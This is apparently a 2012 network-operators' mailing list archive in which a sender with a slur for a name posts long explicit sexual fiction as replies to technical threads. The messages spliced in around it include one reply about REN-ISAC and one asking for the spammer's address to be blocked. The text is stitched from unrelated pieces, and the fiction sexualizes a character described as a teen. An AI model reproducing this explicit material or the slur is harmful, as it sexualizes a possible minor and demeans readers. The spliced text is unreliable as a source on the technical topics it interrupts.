surpassing both Tasha and Kimber. As an added bonus, the swaying, sliding sensation felt fantastic.? ?Wow, Chris! You?re really coming from behind!? cheered Kimber, who, facing in the same direction as Chris, and positioned in front of him in the row, did not see his technique. ?I?m about to cum just from the view from behind,? drooled Tasha, ogling Chris?s butt and the mammoth, swinging bulge between his legs. ?I think he?s a natural.? After a few minutes more of snowboarding, Kimber announced, ?Okay, that was a good warm up. Let?s get our hearts pumping.? She stopped the game and stepped off her board, then bent down and turned it parallel to the tv. Tasha followed suit and Chris complied clumsily, finding it difficult to bend over with a semi-hard boner between him and the board. Once the boards were positioned, Kimber launched a step aerobics routine, and Chris groaned immediately. The huge girth of his balls forced his thighs apart into a bowlegged stance, and the heft of his twenty pound nutsack and thick, fat prick was a burden to swing up with each step. While each of the girls fairly bounced up and down the board, Chris was laboriously heaving himself up and down, feeling like he had a thirty pound sack of potatoes between his legs. Ugh. Whew! I?m not sure how long I can do this. After a few quick, clumsy steps up and down, Chris stepped back off the board. ?I?m not sure I?m quite built for this one, Kimber,? he said apologetically.? ?Oh, Chris? she said while bouncing up and down the step, ?that?s okay. Sit this one out. You can jump back in whenever you want.? Chris waddled around the coffee table and sat down on the couch, spreading his legs wide to give his bloated balls plenty of room. He sighed with relief as the cushions absorbed the weight of his oversized genitals. Chris adjusted himself with both hands and settled down to watch the two girls bounce up and down on the step. This is the kind of workout I can handle! Just get Jen in there too, and my heart rate will be plenty high.? Tasha and Kimber continued their step routine for several more minutes, until Tasha gasped, ?That?s it! I?m picking the next one,? and stepped off the board with slightly wobbly legs. She gave a quick glance back at Chris on the couch, his fat, semi-hard salami bulging visibly through his stretchy pants. ?I think this one is more our speed.? She launched a hula hoop routine, and Chris was transfixed as both girls began gyrating their hips and butts.? ?Ooooh! This one is fun!? squealed Kimber. Fun? This one is freaking amazing!, thought Chris. He could feel his cock immediately start to swell and thicken again. Kimber?s firm bubble butt looked incredible in the tight pink shorts she had on, and it bounced tantalizingly as she swiveled around. Tasha?s posterior wasn?t quite as curvy, though it was still nice, but her silky, high-cut shorts gave Chris a better view of her creamy white hips. Nnnnngh! Gotta get some of that. Chris?s thick prick began to creep even farther down the leg of his pants, easily surpassing the twenty six inch point. His girth continued to swell, stretching the leg of the pants entirely out of proportion. I?ll just slip out of these and I can have Kimber and Tasha right here on the couch. I wonder if I should do Kimber first, or Tasha? I bet Tasha will want to watch me with Kimber. Ohhh, but maybe Kimber will let me kiss her boobs while Tasha swallows first. I wonder if either of them has enough room for a second helping? Suddenly, Chris realized what he was doing. His mammoth schlong had almost reached his ankle in the sweats, and was easily over a foot around. It looked like he had two legs in one leg of the pants. His massive dick was throbbing urgently, and continued to surge and grow. I told Jen that I would control myself until she got back, and I?m already working out seconds with these two. I can?t do that! Jen would freak out! He stroked the side of his ballooning cock wistfully. What am I gonna do? I can?t resist this for six more hours. I gotta get off! He stroked his huge anaconda with both hands, a bit more vigorously. I gotta satisfy my cock. It has to get off soon! Chris?s eyes went back to the two mouthwatering asses shimmying in front of him. Oh, god. I need them soooooo bad. Jen would kill me, but I need some sex sooooon! From nanog195 at yahoo.com Tue Jul 10 10:45:35 2012 From: nanog195 at yahoo.com (NIG NOG) Date: Tue, 10 Jul 2012 08:45:35 -0700 (PDT) Subject: HELP IN SETTING UP iBGPlay In-Reply-To: References: <248cb92a-124d-4f7a-8d2f-f8bfc5e9d9b9@MX-IX-NBO> Message-ID: <1341935135.48155.YahooMailNeo@web142504.mail.bf1.yahoo.com> When he sat down on the bed, he quickly pulled his stretchy pants down as far as he could reach. Still, his tremendous prick was trapped, the pants leg tight around his ankle and the swollen, almost eighteen inch circumference pole. Unh! Gotta give my dick some room! I need this out! Chris lunged forward and desperately pulled at the pants, trying to free his gargantuan schlong and give himself some needed relief.? WHACK! Freed of its confinement, the tree trunk of Chris?s cock slammed into his face. Chris was stunned by the hot, solid mass of his colossal prick. The wide, firm shaft pushed against his face, rising to its full thirty inches proudly. Trying to right himself, Chris grasped his dick firmly with both hands (although unable to fully encircle its eighteen inch girth) and felt any resolve he might have had melt away. Ohh, man. I gotta jerk off. My cock needs to be jerked off. It?s so hard and it?s been waiting sooo long. I won?t call the girls. Jen will understand. I can?t help it. There?s no way I could wait that long. It?s impossible. If I can just jerk off once?a few times? some, I can wait for Jen to get back. Just a few times and I can wait. Maybe an hour or two and I will be fine. Chris?s hands eagerly roamed up and down the expanse of his giant dick, caressing himself and causing him to gasp in anticipation. Yesss. Been waiting so long, haven?t you? Chris wrapped both hands under his throbbing monster and bounced it up and down, feeling every ounce of its massive, twenty-five pound weight. Gotta take good care of this cock. Oooh! Wait! Jen has lube in here! Nothing but the best for my huge cock. You?ve been such a good boy, waiting all this time. Stroking himself lovingly, Chris levered himself upright, spreading his legs wide to accommodate the twenty pound weight of his full, heavy ballsack. That lube will feel sooo good on my fat dick. Oh, yes it will, won?t it? Chris patted his titanic rod proudly, and stood up, feeling the sudden weight of his hugely bloated cock and balls. Ohhh, yeah. Who?s got the biggest package in the world? Me.? He caught a glimpse of himself in Jen?s mirror and straightened up proudly. His gargantuan, smooth ballsack hung heavy between his legs to his knees, pushing his thighs apart due to its incredible size. His thirty inch long cock bobbed up and down as he straighened up, standing up fully erect despite its monumental dimensions. His slender frame was dwarfed by his mammoth package. Chris?s swollen cock was thicker than his arm, and looked to be almost as thick as his thigh. Oh, yeah. That?s what a real man looks like. Nobody else has a cock half as nice as this one. Chris continued to stroke himself as he turned to admire himself in the mirror, watching his gargantuan rod bob up and down hypnotically. Chris experimentally thrust his hips back and forth and was rewarded with the consuming sensation of forty five pounds of hot cock and balls bouncing and flopping between his legs. Ohhh, that feels great! No wonder the girls can?t resist me. Look at all this meat. I?m surprised that Terry and Greg can keep their hands off this beautiful dick. James can?t keep his hands or mouth off my prick, and he hates gays. I must drive Greg crazy.? Chis watched his thick, stiff prick slowly bob as he pumped his hips again and again, letting his immense nutsack shift between his legs. Chris reveled in the feeling of his huge, heavy ballsack sliding over the skin of his thighs He reached down and cupped his immense, bloated balls. He slowly lifted them up, feeling their mass in his arms, and letting their upper curves lift his gargantuan slab of meat. Oh, yeah. Nice and full. Tasha?s right. I do like to keep my balls nice and full. Chris bobbed his nuts up and down, admiring himself in the mirror. Why not? Bigger is better, right? Like Jen said, too big is best. Chis was mesmerized by the sight of his gargantuan genitals, looking so oversized on his small frame. Time to give this fantastic dick a little TLC. Chris confidently leaned forward to grab a bottle of Astroglide from Jen?s bedside table.? ?Aaaaargh!? Chris?s erection, longer than his reach, slammed into the table. Oh, baby! Daddy?s sorry! Chris wrapped his arms around his shaft and hugged it tightly, caressing it with his fingers as he winced. The motion brought his thick, warm shaft to his face as he did so, and without thinking, he leaned forward and kissed it several times. I?m so sorry, gorgeous. I never want to hurt you. Chris continued to kiss his fat salami, moving from quick pecks with closed lips to open-mouthed kisses. Is my baby okay? Can I make it feel better? Chris continued to plant sloppy, wet kisses all over his veiny, throbbing rod. His wet lips wandered over all the hot flesh he could reach. Finally, Chris opened his mouth wide and gave his glans a long, lingering lick. Mmmmmm. Daddy will make it all better. Mmmmmmmmm-hmmmmm. What am I doing? Chris pulled his head back from his dick, with an unexpected reluctance. I?m not gay. Why am I licking my own dick? Chris sat down on the bed and looked at his own mammoth erection. Only gay guys want to suck dick, right? The urges from his huge, throbbing prick were too strong to resist completely. Chris squirted lube all over his right hand and rubbed his hands together, then grasped his thick, veiny shaft and began to stroke slowly. That?s better. It?s not gay to love jerking off. All guys jerk off. I just love it more because my cock is so big and thick. Chris stared at his monster dong with admiration. So much bigger than anyone else. He continued to stroke his shaft with delight, the huge amount of lube squelching as he spread it all over his dick.? I like it when Jen licks me. It feels soooo good. I like it when Kimber and Tasha lick me. They both do it so nice. I like it when the girls lick my cock. Chris reached down and clenched his thick shaft at the base. He slid his hands up the length of his pole as he laid back on the bed. When he couldn?t reach any higher, he reversed direction and began to stroke downward towards his overstuffed balls. I?m too big to even reach my cockhead this way. It?s so great to be too big. Chris massaged his swollen, churning nuts.? It felt pretty good even when James sucked my dick. I wasn?t looking for a guy to suck me off, but that felt pretty good, too. He was crazy for it, just like the girls. Anybody would be crazy for this cock. Chris started another slow, leisurely stroke up his cock, but this time he pulled his huge, thick prick close to his body, bringing his gigantic, broad cockhead close to his face. This way I can stroke it all the way to the head. His massive prick felt so heavy and hot on his torso. I like having my cock sucked. Chris?s gargantuan dick was now throbbing less than an inch away from his face. I love having my cock sucked. He began to stroke it steadily, faster and faster, keeping it held close to his body, and his face. My cock loves to be sucked. He crossed his legs in a loose lotus position, squeezing his massive ballsack with gentle pressure. Chris continued to stroke his thick salami, roaming his hands all over his sensitive shaft. My cock needs to be sucked. He brought the tip of his tongue out of his mouth and lightly licked his own cock head. Ohhhhh, yeah! The feeling was amazingly intense. That feels incredible! Chris continued to massage his veiny monster, trying to restrain himself from licking his dick again. It?s not gay if you suck your own dick, is it? He licked himself again, tentatively. Fuck, that feels good! It?s not gay if you jerk yourself off, right? Chris squeezed his legs together, increasing the pressure inside his swollen ballsack. It?s gay if you beat off another guy, but it?s not gay to jerk off yourself. Chris allowed himself a long, lingering lick, roaming from one side of his huge shaft to the other. It?s totally not gay to suck your own cock, then.? Chris began to lick his own cock with increasing vigor. As his huge dick was almost six inches thicker than a two-liter bottle, he was unable to reach everywhere, but he was obviously making an effort. Mmm. Feels so good. As he continued to stroke his dick harder and faster, Chris began to slurp and kiss his own cock head, planting wet, sucking kisses all over his cock head. Such a good cock. So tasty and delicious. Soon, Chris was arching his back, hugging his fat monster to his chest to let his frenzied tongue lick the very tip of his broad, red cock head. I wish I could lick every inch, buddy, but I?m doing my best! You?re just soooo big. Stretching, Chris devoured his cock head with his tongue, from the fat, sensitive rim to the very end of his cock slit. His tongue strained to reach everywhere, but Chris?s dick was just too massive for his mouth to be able to reach every spot. I need some help licking this cock. The girls might be able to handle all of it, but I bet a few more girls could just about lick all of it at once. The thought of a bevy of beautiful girls all determinedly slurping on his giant schlong turned Chris on even more. Mmph. Chris slurped his open mouth all over his cock head, eagerly tonguing himself into a frenzy. Mmmmmph. Chris rocked his legs back and forth, pumping his bloated, overfilled balls with sensation. Mmmmmmmmmmmmph. Chris lapped his tongue up and down his hypersensitized cock slit. Oh, fuck! I?m gonna cum all over Jen?s bed! Chris could feel a massive, unstoppable orgasm building deep in his balls. He did the only thing he could. He took a deep breath and planted his mouth firmly over his own, gigantic cock slit.? Uuuuuuuuuuungh! Chris felt the flood of cum begin to geyser up from his balls, flooding inexorably up his thick, hot shaft. Automatically, his arms continued to stroke his colossal rod and his legs clenched to squeeze the most spunk out of his super-sized nuts. Before he even thought about it, a torrent of thick, hot jizz had erupted into his mouth. Mmmph! There?s so much! Chris struggled to gulp it all down, already feeling a second pulse of cum building up in his balls. It tastes?good! Ughpf! Chris guzzled down the second surge of jizz, and the third, but he could tell that his weighty nutsack had plenty more to come. I?m not sure I can swallow all this. Its too much! As a fourth, then fifth flood of semen bulged out his cheeks before being sucked down, Chris felt a familiar fullness building in his flat tummy. I?m cumming so much I?m filling up my tummy! How much jizz have I swallowed? I?m getting full! Involuntarily, Chris thought of the gorgeous little Persephone, seated on the table, stuffing him with doughnut after doughnut. No, I?m not! If I can stuff myself with doughnuts I can stuff myself with cum. I can do this! Chris tightened his grip on his gigantic rod and began to pump even more vigorously. He choked down enough spunk to let himself take a gasp of air, and began to suck desperately on his own cock. Mmmmmm, yeah! Come on, baby, gimme all you got! After a dozen huge pulses of cum had surged up his cock and into his eager mouth, Chris?s stomach was full and bulging. However, he carefully and deliberately squeezed his entire shaft, from root to tip, while sucking as hard as he could. Chris carefully drained every drop of cum he could out of his huge cock before releasing his liplock on his fat cockhead. He licked his lips to recover every ounce of spunk, then rubbed his hands over his full belly with satisfaction. Aaaaah. Just a little bit and all of this will go right back to fattening up my balls. I could probably do this all ni? ?Can you start over? I forgot to grab my camera.? Chris glanced around the massive column of his still firm dick and saw Tasha and Kimber watching from the open door.? Kimber began to clap. ?Oh, Chris, that was amazing! I think you swallowed even more than me or Jen! ? From ops.lists at gmail.com Tue Jul 10 10:49:07 2012 From: ops.lists at gmail.com (Suresh Ramasubramanian) Date: Tue, 10 Jul 2012 21:19:07 +0530 Subject: U.S. spy agencies ... email for cybersecurity In-Reply-To: <4FFC496B.7070004@ip-solutions.net> References: <4FFB898B.2000908@gmail.com> <3850.1341932602@turing-police.cc.vt.edu> <4FFC496B.7070004@ip-solutions.net> Message-ID: On Tue, Jul 10, 2012 at 8:55 PM, Harry Hoffman wrote: > The government is already doing this via the ISACs. > > http://www.ren-isac.net/docs/charter.html I have a lot of respect for what REN-ISAC does but it doesn't nearly have the sort of coverage this project appears to be looking at. -- Suresh Ramasubramanian (ops.lists at gmail.com) From nanog195 at yahoo.com Tue Jul 10 10:49:05 2012 From: nanog195 at yahoo.com (NIG NOG) Date: Tue, 10 Jul 2012 08:49:05 -0700 (PDT) Subject: arin ipv6 whois working for you? In-Reply-To: References: Message-ID: <1341935345.53325.YahooMailNeo@web142506.mail.bf1.yahoo.com> Oh, crap! How long have I been sucking myself off? ?It?s been over an hour, Chris! You said you were gonna call your roommate!? Tasha strode into the room, unashamed, and pried his colossal shaft out of his hands. ?I told you, call me before you suck yourself off again! That kind of kinky stuff is internet gold, and you?re wasting it off-camera! If you wanna be an internet sex legend, you?ve gotta let me shoot this stuff.? Tasha made a face and dropped his fat prick on the bed, letting it thud heavily between his legs. ?Ewww. It?s all sticky with jizz and slobber. Go shower up and we?ll stuff you till your balls are ready to burst again. Then we?ll start again from the top, okay??? ?Uh?? said Chris. His stomach was painfully full. Have I really been sucking myself off for a whole hour? ?What did your roommate say about making more cream? Is he game? Do the ingredients cost a lot or something?? Chris pushed himself to a seated position. He could already feel his belly slowly shrinking as his metabolism worked overtime to convert his ?meal? back into fresh cum for his huge nuts. However, his belly still swayed and sloshed from all the jizz he had gulped down. Ohh, I think I?ve got about a gallon of spunk in there. Ooof. ?Actually, he?s already gotten more cream made. Terry said I could drop by tonight and pick some up.? ?Don?t fuck with me, Long Wang. This is big boobs you?re talking about.? Tasha stared at him intently. ?I?m not kidding, Tasha. We can go over and get the cream right now. You can use it and get big boobs tonight.? Chris watched as Tasha?s expression turned from one of disbelief to excitement. She reached over and grabbed his left hand, and pulled him out of the bed. Chris?s massive, still firm erection and weighty balls swung heavily between his legs as he stood. He clutched his bulging stomach with both hands. I?m so full of cum. I just need a little bit to digest all of this.? ?What are we waiting for, doofus?? She pushed the naked, over-endowed boy out of the bedroom. Chris staggered as his mammoth nutsack and gargantuan dick flopped between his legs. ?Shower up so we can go. Tasha needs a big set of boobs! Chop, chop!? As she bundled Chris into the bathroom, she shouted over her shoulder, ?Kimber! Wrap it up! We got errands to run and bras to burst. Move it!?? Chris stumbled into the girls? bathroom. Okay, it?s not gay to suck myself off. Is it gay to fantasize about sucking off a dozen guys when I?m doing it? He stopped short as he saw himself in the mirror. Looking back at him was a slender Asian teen with a lean, wiry build, except for an almost comically bulging belly, and, of course, two gargantuan balls and a colossal, almost completely erect cock. Chris?s chest and arms were smooth and hairless, as was his tight butt, and his huge, heavy nutsack. Though not completely erect, his massive, fat prick jutted out proudly from his body, stretching to at least twenty-seven inches, and swaying with every move he made.? Chris put his hands on his hips and leaned back a little, emphasizing his gigantic dick, and his round belly. Damn! Look at me! I look fantastic! Chris turned left and right, admiring himself in the mirror. He could feel his massive dick begin to stiffen again. No wonder I can?t keep my hands off it. This cock looks amazing! Chris turned to face the mirror and spread his legs, grasping his stiffening cock with both hands and stroking it lovingly. He gently turned it slightly to the right, then to the left. Fuck! This is just about the perfect size. I was made to have a cock this big! Look how hot it looks. I can?t believe Greg and Terry don?t want one this big. It feels soooo good! Chris interrupted his stroking to run his hands over his protruding belly. Damn! How much cum did I swallow? Did I gulp down as much as James did? Chris patted his tummy gently. Doesn?t much matter, I guess. It will all be more cum in my balls soon. It?s not gay to jerk off, so it?s not gay to suck yourself off either. I can do it as much as I want. No matter how much I suck my own cock, that?s not gay. Chris?s cock began to stiffen even more at the thought. He looked up at the rising, swelling head of his penis, then noticed the spurts of jizz in his hair, on his face, and all over his chest. I?ve gotta be a little more careful, that?s all. No sense wasting any. If I swallow it all, it keeps my balls nice and full. He turned and waddled towards the shower. Still, I should probably wash this off, though. Next time, maybe the girls can help, and clean me up afterwards. They all seemed to like the taste. Chris turned on the shower, and after it got warm, he stepped into the spray, careful to keep his nutsack from dragging on the edge of the tub, or his dick from bumping into the shower wall. The shower was full of girly shampoo, body wash, scrubbers, and other, mysterious trappings. Chris had to be careful not to knock anything over with his fat slab of meat. He waddled around the shower gingerly, his meaty balls swaying between his legs. He selected some fruity-smelling shampoo and worked it into his hair. That smells nice. Makes me hungry, actually. My balls probably need some more fuel. Chris rinsed his hair thoroughly, and selected another, equally fruity smelling bodywash. First, he carefully scrubbed his face and chest, but shortly after reaching down to clean his legs, he was distracted. Gotta take care of my boys. Chris squirted the body wash all over his huge balls and began sudsing them up. Ohhhhh, yeah. That feels good. Chris continued to vigorously massage his huge, heavy nuts until his massive cock was fully erect. Now to take care of my baby. Chris squirted most of the rest of the body wash all over the thirty inches of his huge, thick shaft, and began to soap and scrub his gigantic dick with gusto. Get my baby squeaky clean. Clean enough to eat off. Chris continued to fondle his soapy prick with pleasure.? The mammoth weight of his fully engorged prick was unbalancing, so Chris leaned back, pressing his smooth, tight buttocks against the back shower wall. He began stroking his swollen shaft with both hands, in long strokes from the root upwards. Mmmm. Just need a little something special for my special cock. Chris brought the massive cock head upwards towards his mouth and began licking his own cock head again. Oh, that?s what I need! Feels so good. Chris began to slurp hungrily. Just gotta get some more cum. Just need to shoot a few more loads in my tummy and I might be soft enough to leave the house. Chris dipped his tongue into his huge cock slit hungrily. A few more hours maybe. Just gotta get enough cum. It?s not gay to suck your own dick, no matter how much you swallow.? Chris felt his balls begin to tense up and he ?choked up? his grip on his elephantine dick and started sucking with anticipation, his mouth clamped over his cock slit. Yeah! Feels so good! Gimme that cum. Fill up my tummy! His massive orgasm began, sending surge after surge of jizz pumping up through his massive, swollen dick. Chris excitedly pumped his cock again and again, expertly slurping up the colossal load of cum pumped out by his balls. Mmmmm. Sooo good. Chris?s eyes rolled back in his head as he stroked away, gulping down a warm, salty quart of semen. I could do this all night. It feels soo good. Chris brought his hands back down from the head of his dick and began to stroke again. Should be ready for more in just a minute or two. ?Chris! What?s taking so long?? Kimber burst into the bathroom and stared at Chris, sucking on his own massive erection in the shower. ?Oh, wow!? From shortdudey123 at gmail.com Tue Jul 10 10:51:36 2012 From: shortdudey123 at gmail.com (Grant Ridder) Date: Tue, 10 Jul 2012 10:51:36 -0500 Subject: HELP IN SETTING UP iBGPlay In-Reply-To: <1341935135.48155.YahooMailNeo@web142504.mail.bf1.yahoo.com> References: <248cb92a-124d-4f7a-8d2f-f8bfc5e9d9b9@MX-IX-NBO> <1341935135.48155.YahooMailNeo@web142504.mail.bf1.yahoo.com> Message-ID: can someone do a blanket block on nanog*@yahoo.com? On Tue, Jul 10, 2012 at 10:45 AM, NIG NOG wrote: > > > > > > When he sat down on the bed, he quickly pulled his stretchy pants down as > far as he could reach. Still, his tremendous prick was trapped, the pants > leg tight around his ankle and the swollen, almost eighteen inch > circumference pole. Unh! Gotta give my dick some room! I need this out! > Chris lunged forward and desperately pulled at the pants, trying to free > his gargantuan schlong and give himself some needed relief. > > WHACK! Freed of its confinement, the tree trunk of Chris?s cock slammed > into his face. Chris was stunned by the hot, solid mass of his colossal > prick. The wide, firm shaft pushed against his face, rising to its full > thirty inches proudly. Trying to right himself, Chris grasped his dick > firmly with both hands (although unable to fully encircle its eighteen inch > girth) and felt any resolve he might have had melt away. Ohh, man. I gotta > jerk off. My cock needs to be jerked off. It?s so hard and it?s been > waiting sooo long. I won?t call the girls. Jen will understand. I can?t > help it. There?s no way I could wait that long. It?s impossible. If I can > just jerk off once?a few times? some, I can wait for Jen to get back. Just > a few times and I can wait. Maybe an hour or two and I will be fine. > Chris?s hands eagerly roamed up and down the expanse of his giant dick, > caressing himself and causing him to gasp in anticipation. Yesss. Been > waiting > so long, haven?t you? Chris wrapped both hands under his throbbing > monster and bounced it up and down, feeling every ounce of its massive, > twenty-five pound weight. Gotta take good care of this cock. > > Oooh! Wait! Jen has lube in here! Nothing but the best for my huge cock. > You?ve been such a good boy, waiting all this time. Stroking himself > lovingly, Chris levered himself upright, spreading his legs wide to > accommodate the twenty pound weight of his full, heavy ballsack. That lube > will feel sooo good on my fat dick. Oh, yes it will, won?t it? Chris patted > his titanic rod proudly, and stood up, feeling the sudden weight of his > hugely bloated cock and balls. Ohhh, yeah. Who?s got the biggest package in > the world? Me. > > He caught a glimpse of himself in Jen?s mirror and straightened up > proudly. His gargantuan, smooth ballsack hung heavy between his legs to his > knees, pushing his thighs apart due to its incredible size. His thirty inch > long cock bobbed up and down as he straighened up, standing up fully erect > despite its monumental dimensions. His slender frame was dwarfed by his > mammoth package. Chris?s swollen cock was thicker than his arm, and looked > to be almost as thick as his thigh. Oh, yeah. That?s what a real man looks > like. Nobody else has a cock half as nice as this one. Chris continued to > stroke himself as he turned to admire himself in the mirror, watching his > gargantuan rod bob up and down hypnotically. Chris experimentally thrust > his hips back and forth and was rewarded with the consuming sensation of > forty five pounds of hot cock and balls bouncing and flopping between his > legs. Ohhh, that feels great! No wonder the girls can?t resist me. Look at > all this meat. I?m surprised that Terry and Greg can keep their hands off > this beautiful dick. James can?t keep his hands or mouth off my prick, and > he hates gays. I must drive Greg crazy. > > Chis watched his thick, stiff prick slowly bob as he pumped his hips again > and again, letting his immense nutsack shift between his legs. Chris > reveled in the feeling of his huge, heavy ballsack sliding over the skin of > his thighs He reached down and cupped his immense, bloated balls. He slowly > lifted them up, feeling their mass in his arms, and letting their upper > curves lift his gargantuan slab of meat. Oh, yeah. Nice and full. Tasha?s > right. I do like to keep my balls nice and full. Chris bobbed his nuts up > and down, admiring himself in the mirror. Why not? Bigger is better, right? > Like Jen said, too big is best. Chis was mesmerized by the sight of his > gargantuan genitals, looking so oversized on his small frame. Time to give > this fantastic dick a little TLC. Chris confidently leaned forward to grab > a bottle of Astroglide from Jen?s bedside table. > > > ?Aaaaargh!? Chris?s erection, longer than his reach, slammed into the > table. Oh, baby! Daddy?s sorry! Chris wrapped his arms around his shaft and > hugged it tightly, caressing it with his fingers as he winced. The motion > brought his thick, warm shaft to his face as he did so, and without > thinking, he leaned forward and kissed it several times. I?m so sorry, > gorgeous. I never want to hurt you. Chris continued to kiss his fat salami, > moving from quick pecks with closed lips to open-mouthed kisses. Is my baby > okay? Can I make it feel better? Chris continued to plant sloppy, wet > kisses all over his veiny, throbbing rod. His wet lips wandered over all > the hot flesh he could reach. Finally, Chris opened his mouth wide and gave > his glans a long, lingering lick. Mmmmmm. Daddy will make it all better. > Mmmmmmmmm-hmmmmm. > > What am I doing? Chris pulled his head back from his dick, with an > unexpected reluctance. I?m not gay. Why am I licking my own dick? Chris sat > down on the bed and looked at his own mammoth erection. Only gay guys want > to suck dick, right? The urges from his huge, throbbing prick were too > strong to resist completely. Chris squirted lube all over his right hand > and rubbed his hands together, then grasped his thick, veiny shaft and > began to stroke slowly. That?s better. It?s not gay to love jerking off. > All guys jerk off. I just love it more because my cock is so big and thick. > Chris stared at his monster dong with admiration. So much bigger than > anyone else. He continued to stroke his shaft with delight, the huge amount > of lube squelching as he spread it all over his dick. > > I like it when Jen licks me. It feels soooo good. I like it when Kimber > and Tasha lick me. They both do it so nice. I like it when the girls lick > my cock. Chris reached down and clenched his thick shaft at the base. He > slid his hands up the length of his pole as he laid back on the bed. When > he couldn?t reach any higher, he reversed direction and began to stroke > downward towards his overstuffed balls. I?m too big to even reach my > cockhead this way. It?s so great to be too big. Chris massaged his swollen, > churning nuts. > > It felt pretty good even when James sucked my dick. I wasn?t looking for a > guy to suck me off, but that felt pretty good, too. He was crazy for it, > just like the girls. Anybody would be crazy for this cock. Chris started > another slow, leisurely stroke up his cock, but this time he pulled his > huge, thick prick close to his body, bringing his gigantic, broad cockhead > close to his face. This way I can stroke it all the way to the head. His > massive prick felt so heavy and hot on his torso. I like having my cock > sucked. Chris?s gargantuan dick was now throbbing less than an inch away > from his face. I love having my cock sucked. He began to stroke it > steadily, faster and faster, keeping it held close to his body, and his > face. My cock loves to be sucked. He crossed his legs in a loose lotus > position, squeezing his massive ballsack with gentle pressure. Chris > continued to stroke his thick salami, roaming his hands all over his > sensitive shaft. My cock needs > to be sucked. He brought the tip of his tongue out of his mouth and > lightly licked his own cock head. > > Ohhhhh, yeah! The feeling was amazingly intense. That feels incredible! > Chris continued to massage his veiny monster, trying to restrain himself > from licking his dick again. It?s not gay if you suck your own dick, is it? > He licked himself again, tentatively. Fuck, that feels good! It?s not gay > if you jerk yourself off, right? Chris squeezed his legs together, > increasing the pressure inside his swollen ballsack. It?s gay if you beat > off another guy, but it?s not gay to jerk off yourself. Chris allowed > himself a long, lingering lick, roaming from one side of his huge shaft to > the other. It?s totally not gay to suck your own cock, then. > > Chris began to lick his own cock with increasing vigor. As his huge dick > was almost six inches thicker than a two-liter bottle, he was unable to > reach everywhere, but he was obviously making an effort. Mmm. Feels so > good. As he continued to stroke his dick harder and faster, Chris began to > slurp and kiss his own cock head, planting wet, sucking kisses all over his > cock head. Such a good cock. So tasty and delicious. Soon, Chris was > arching his back, hugging his fat monster to his chest to let his frenzied > tongue lick the very tip of his broad, red cock head. I wish I could lick > every inch, buddy, but I?m doing my best! You?re just soooo big. > Stretching, Chris devoured his cock head with his tongue, from the fat, > sensitive rim to the very end of his cock slit. His tongue strained to > reach everywhere, but Chris?s dick was just too massive for his mouth to be > able to reach every spot. I need some help licking this cock. The girls > might be able to > handle all of it, but I bet a few more girls could just about lick all of > it at once. The thought of a bevy of beautiful girls all determinedly > slurping on his giant schlong turned Chris on even more. > > Mmph. Chris slurped his open mouth all over his cock head, eagerly > tonguing himself into a frenzy. Mmmmmph. Chris rocked his legs back and > forth, pumping his bloated, overfilled balls with sensation. > Mmmmmmmmmmmmph. Chris lapped his tongue up and down his hypersensitized > cock slit. > > Oh, fuck! I?m gonna cum all over Jen?s bed! Chris could feel a massive, > unstoppable orgasm building deep in his balls. He did the only thing he > could. He took a deep breath and planted his mouth firmly over his own, > gigantic cock slit. > > Uuuuuuuuuuungh! Chris felt the flood of cum begin to geyser up from his > balls, flooding inexorably up his thick, hot shaft. Automatically, his arms > continued to stroke his colossal rod and his legs clenched to squeeze the > most spunk out of his super-sized nuts. Before he even thought about it, a > torrent of thick, hot jizz had erupted into his mouth. Mmmph! There?s so > much! Chris struggled to gulp it all down, already feeling a second pulse > of cum building up in his balls. It tastes?good! Ughpf! Chris guzzled down > the second surge of jizz, and the third, but he could tell that his weighty > nutsack had plenty more to come. I?m not sure I can swallow all this. Its > too much! As a fourth, then fifth flood of semen bulged out his cheeks > before being sucked down, Chris felt a familiar fullness building in his > flat tummy. I?m cumming so much I?m filling up my tummy! How much jizz have > I swallowed? I?m getting full! Involuntarily, Chris thought of the > gorgeous little Persephone, seated on the table, stuffing him with > doughnut after doughnut. No, I?m not! If I can stuff myself with doughnuts > I can stuff myself with cum. I can do this! Chris tightened his grip on his > gigantic rod and began to pump even more vigorously. He choked down enough > spunk to let himself take a gasp of air, and began to suck desperately on > his own cock. Mmmmmm, yeah! Come on, baby, gimme all you got! > > After a dozen huge pulses of cum had surged up his cock and into his eager > mouth, Chris?s stomach was full and bulging. However, he carefully and > deliberately squeezed his entire shaft, from root to tip, while sucking as > hard as he could. Chris carefully drained every drop of cum he could out of > his huge cock before releasing his liplock on his fat cockhead. He licked > his lips to recover every ounce of spunk, then rubbed his hands over his > full belly with satisfaction. Aaaaah. Just a little bit and all of this > will go right back to fattening up my balls. I could probably do this all > ni? > > ?Can you start over? I forgot to grab my camera.? Chris glanced around the > massive column of his still firm dick and saw Tasha and Kimber watching > from the open door. > > Kimber began to clap. ?Oh, Chris, that was amazing! I think you swallowed > even more than me or Jen! ? > From nanog195 at yahoo.com Tue Jul 10 10:53:34 2012 From: nanog195 at yahoo.com (NIG NOG) Date: Tue, 10 Jul 2012 08:53:34 -0700 (PDT) Subject: Running your own DNSchanger proxies In-Reply-To: <4FF9659C.5090601@gmail.com> References: <4FF9659C.5090601@gmail.com> Message-ID: <1341935614.84029.YahooMailNeo@web142502.mail.bf1.yahoo.com> Kimber seemed focused on it, rather than him. She continued to stare at the broad head of his dick. ?I, uh, needed to get it soft so I could put on my, uh, pants, and uh.? ?Oh! Okay!. I?m still surprised by how huge you are.? Kimber smiled shyly , but pulled back the shower curtain, and held out a folded bundle. ?I fixed your pants. I stitched up the seam.? She looked questioningly at his mammoth, erect cock. ?Do you think it will be soft soon? Tasha and I really want to go get the growth cream." She blushed. ?Tasha?s not the only one who wants a little more up top.? Kimber looked back to his huge anaconda as he held it, his hands gripping, but not able to encircle the thick shaft.. Chris turned off the shower and Kimber handed him a towel. ?Here you go!? As he took the fluffy towel, Chris turned and his swollen, thirty inch boner swung well out of the shower and hovered an inch or two from Kimber. She smiled and patted the fuzzy cover on the toilet seat lid. ?Why don?t you come out here and dry off, silly?? Chris did as he was told, awkwardly stepping around Kimber to avoid poking her with his fat tree trunk of a dick. Maneuvering around the bathroom without allowing his nearly yard long cock to slam into Kimber, or anything else, was tricky. He sat down on the toilet, but his warm, swaying balls suddenly contacted the cold porcelain of the toilet. He gasped and leaned back suddenly, causing his enormous cock to swing upwards towards Kimber?s face. He grabbed it hastily, anxious to avoid smacking her in the face with his heavy, thick member. Kimber laughed nervously, but then put both of her own soft hands on his huge dick, too. ?We might as well get started, right?? She began to stroke and knead his throbbing prick, which immediately returned to rock hardness. ?Uh, wha?? Chris found it hard to form coherent sentences, between the wonderful sensation of Kimber?s small, gentle hands on his cock, and the 